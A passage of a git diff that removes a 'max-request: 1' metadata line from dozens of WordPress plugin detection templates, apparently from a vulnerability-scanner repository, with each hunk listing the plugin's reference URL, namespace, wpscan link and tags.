- https://wordpress.org/plugins/gtranslate/
metadata:
- max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb5..3f4c6c89365 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
- max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80ca..fa1bb641158 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
- max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
index 2409c6b370b..a8eca7b0566 100644
--- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
+++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
- max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da2..da63d1cbf65 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
- max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cff..f94e7f64946 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
- max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d1..95d2aa5f16b 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
- max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b90779..af8193b8759 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
- max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92b..8d7e45818b4 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
- max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef80..ed3967db7b4 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
- max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563e..2ff5adba86e 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
- max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da934..9099f3c0a50 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
- max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a1..1ee0e675427 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
- max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625a..43cb2ab09ce 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
- max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363c..7ba81036cf4 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
- max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562da..24fc3e32951 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
- max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc66..3e895055741 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/jetpack-boost/
metadata:
- max-request: 1
plugin_namespace: jetpack-boost
wpscan: https://wpscan.com/plugin/jetpack-boost
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a7..e701e365ba9 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
- max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bda..c0cc5400a8b 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
- max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14fd..22687bcffee 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
- max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e7..b69d3d5bfef 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/leadin/
metadata:
- max-request: 1
plugin_namespace: leadin
wpscan: https://wpscan.com/plugin/leadin
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33c..7975a577026 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts-reloaded/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts-reloaded
wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b6..ff4cef94d7e 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/limit-login-attempts/
metadata:
- max-request: 1
plugin_namespace: limit-login-attempts
wpscan: https://wpscan.com/plugin/limit-login-attempts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b5069797..a8903697b06 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/litespeed-cache/
metadata:
- max-request: 1
plugin_namespace: litespeed-cache
wpscan: https://wpscan.com/plugin/litespeed-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b9..3f141c44767 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loco-translate/
metadata:
- max-request: 1
plugin_namespace: loco-translate
wpscan: https://wpscan.com/plugin/loco-translate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee4..5355e988a25 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginizer/
metadata:
- max-request: 1
plugin_namespace: loginizer
wpscan: https://wpscan.com/plugin/loginizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76b..6f06b490112 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/loginpress/
metadata:
- max-request: 1
plugin_namespace: loginpress
wpscan: https://wpscan.com/plugin/loginpress
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630be..53d409fb689 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-woocommerce
wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9b..0e908a9580f 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailchimp-for-wp/
metadata:
- max-request: 1
plugin_namespace: mailchimp-for-wp
wpscan: https://wpscan.com/plugin/mailchimp-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e7..aeb1875c57a 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mailpoet/
metadata:
- max-request: 1
plugin_namespace: mailpoet
wpscan: https://wpscan.com/plugin/mailpoet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c5..7c157023055 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/maintenance/
metadata:
- max-request: 1
plugin_namespace: maintenance
wpscan: https://wpscan.com/plugin/maintenance
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e8..5ce87e6c711 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/mainwp-child/
metadata:
- max-request: 1
plugin_namespace: mainwp-child
wpscan: https://wpscan.com/plugin/mainwp-child
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a37..c342e6b45ae 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/malcare-security/
metadata:
- max-request: 1
plugin_namespace: malcare-security
wpscan: https://wpscan.com/plugin/malcare-security
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bfa..e95041f555c 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/megamenu/
metadata:
- max-request: 1
plugin_namespace: megamenu
wpscan: https://wpscan.com/plugin/megamenu
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a6..879a0d1c12c 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/members/
metadata:
- max-request: 1
plugin_namespace: members
wpscan: https://wpscan.com/plugin/members
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f8..985f5d373a5 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/meta-box/
metadata:
- max-request: 1
plugin_namespace: meta-box
wpscan: https://wpscan.com/plugin/meta-box
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e15..bbc305b8def 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ml-slider/
metadata:
- max-request: 1
plugin_namespace: ml-slider
wpscan: https://wpscan.com/plugin/ml-slider
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f632..7e3e4e2d7e2 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/newsletter/
metadata:
- max-request: 1
plugin_namespace: newsletter
wpscan: https://wpscan.com/plugin/newsletter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac88..17ea142c466 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextend-facebook-connect/
metadata:
- max-request: 1
plugin_namespace: nextend-facebook-connect
wpscan: https://wpscan.com/plugin/nextend-facebook-connect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04d..953e4ab3d8b 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/nextgen-gallery/
metadata:
- max-request: 1
plugin_namespace: nextgen-gallery
wpscan: https://wpscan.com/plugin/nextgen-gallery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe064..92107fa69c0 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ninja-forms/
metadata:
- max-request: 1
plugin_namespace: ninja-forms
wpscan: https://wpscan.com/plugin/ninja-forms
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d63..5e1fe4ef5c3 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ocean-extra/
metadata:
- max-request: 1
plugin_namespace: ocean-extra
wpscan: https://wpscan.com/plugin/ocean-extra
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f4..74fb3e60102 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/official-facebook-pixel/
metadata:
- max-request: 1
plugin_namespace: official-facebook-pixel
wpscan: https://wpscan.com/plugin/official-facebook-pixel
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9fa..b9f70ba5558 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/one-click-demo-import/
metadata:
- max-request: 1
plugin_namespace: one-click-demo-import
wpscan: https://wpscan.com/plugin/one-click-demo-import
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b72..6486c02c9ae 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/optinmonster/
metadata:
- max-request: 1
plugin_namespace: optinmonster
wpscan: https://wpscan.com/plugin/optinmonster
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b577081..81f58198d38 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/otter-blocks/
metadata:
- max-request: 1
plugin_namespace: otter-blocks
wpscan: https://wpscan.com/plugin/otter-blocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6b..3743307dbc2 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/password-protected/
metadata:
- max-request: 1
plugin_namespace: password-protected
wpscan: https://wpscan.com/plugin/password-protected
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e163..a4c69800414 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pdf-embedder/
metadata:
- max-request: 1
plugin_namespace: pdf-embedder
wpscan: https://wpscan.com/plugin/pdf-embedder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a80..adf3387ddb6 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pixelyoursite/
metadata:
- max-request: 1
plugin_namespace: pixelyoursite
wpscan: https://wpscan.com/plugin/pixelyoursite
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f42642..eb6e1aaa5dd 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/polylang/
metadata:
- max-request: 1
plugin_namespace: polylang
wpscan: https://wpscan.com/plugin/polylang
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42b..b3c83cd0bf7 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-builder/
metadata:
- max-request: 1
plugin_namespace: popup-builder
wpscan: https://wpscan.com/plugin/popup-builder
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13ca..96d8bd6aca8 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/popup-maker/
metadata:
- max-request: 1
plugin_namespace: popup-maker
wpscan: https://wpscan.com/plugin/popup-maker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b566..85955ac95e2 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-smtp/
metadata:
- max-request: 1
plugin_namespace: post-smtp
wpscan: https://wpscan.com/plugin/post-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7af..a81fc892ca8 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/post-types-order/
metadata:
- max-request: 1
plugin_namespace: post-types-order
wpscan: https://wpscan.com/plugin/post-types-order
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de1..d9c6052cd7e 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/premium-addons-for-elementor/
metadata:
- max-request: 1
plugin_namespace: premium-addons-for-elementor
wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e824..afc1141e0c9 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/pretty-link/
metadata:
- max-request: 1
plugin_namespace: pretty-link
wpscan: https://wpscan.com/plugin/pretty-link
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4ebd..d44add9ca68 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/really-simple-captcha/
metadata:
- max-request: 1
plugin_namespace: really-simple-captcha
wpscan: https://wpscan.com/plugin/really-simple-captcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
